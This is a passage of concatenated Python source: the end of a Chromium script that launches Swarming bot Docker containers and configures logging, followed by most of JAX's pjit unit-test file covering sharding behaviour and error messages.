t.join()
def add_launch_arguments(parser): # pragma: no cover
def max_uptime(value):
value = int(value)
if value < _MIN_HOST_UPTIME and value != 0:
raise argparse.ArgumentTypeError(
'--max-host-time must be > %d or zero' % _MIN_HOST_UPTIME)
return value
parser.add_argument(
'-c', '--canary', action='store_true', default=False,
help='Run this as a canary bot.')
parser.add_argument(
'--max-container-uptime', type=int, default=60 * 4,
help='Max uptime of a container, in minutes.')
parser.add_argument(
'--reboot-grace-period', type=int, default=60 * 4,
help='How long to wait (in minutes) for swarming bots to gracefully '
'shutdown before triggering a host reboot. Should be at least as '
'long as the longest expected task run time. Defaults to 4 hours.')
parser.add_argument(
'--image-name', default='swarm_docker:latest',
help='Name of docker image to launch from.')
parser.add_argument(
'--swarming-server', default='https://chromium-swarm.appspot.com',
help='URL of the swarming server to connect to.')
parser.add_argument(
'--registry-project', default='chromium-container-registry',
help='Name of gcloud project id for the container registry.')
parser.add_argument(
'--credentials-file',
default='/creds/service_accounts/'
'service-account-container_registry_puller.json',
help='Path to service account json file used to access the gcloud '
'container registry.')
parser.add_argument(
'--max-host-uptime', type=max_uptime, default=60 * 24,
help='Max uptime of the host, in minutes. A value of zero indicates the '
'host will never be rebooted automatically.')
def configure_logging(log_filename, log_prefix, verbose): # pragma: no cover
logger = logging.getLogger()
logger.setLevel(logging.DEBUG if verbose else logging.WARNING)
log_fmt = logging.Formatter(
'%(asctime)s.%(msecs)03d %(levelname)s ' + log_prefix + ' %(message)s' ,
datefmt='%y%m%d %H:%M:%S')
file_handler = logging.handlers.RotatingFileHandler(
'/var/log/chrome-infra/%s' % log_filename,
maxBytes=10 * 1024 * 1024, backupCount=5)
file_handler.setFormatter(log_fmt)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stdout_handler)
# Quiet some noisy modules.
cmd_helper_logger = logging.getLogger('devil.utils.cmd_helper')
cmd_helper_logger.setLevel(logging.ERROR)
urllib3_logger = logging.getLogger('requests.packages.urllib3.connectionpool')
urllib3_logger.setLevel(logging.WARNING)
# urllib3's module path is different when invoked via vpython.
# TODO(crbug.com/977627): Remove the old path when we tear out infra VENV
# support.
vypy_urllib3_logger = logging.getLogger('urllib3.connectionpool')
vypy_urllib3_logger.setLevel(logging.WARNING)
@contextlib.contextmanager
def main_wrapper(): # pragma: no cover
if sys.platform != 'linux2':
print('Only supported on linux.', file=sys.stderr)
sys.exit(1)
try:
yield
except containers.FrozenEngineError:
logging.exception('Docker engine frozen, triggering host reboot.')
# Skipping updates since something is very wrong with docker here.
reboot_host(skip_update=True)
except Exception as e:
logging.exception('Exception:')
raise e
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import pjit, pjit_p, with_sharding_constraint, SpecSync
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
@unittest.skipIf(jax._src.lib.version < (0, 1, 72), "Needs jaxlib 0.1.72+")
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithAbstractArgs(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4, in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
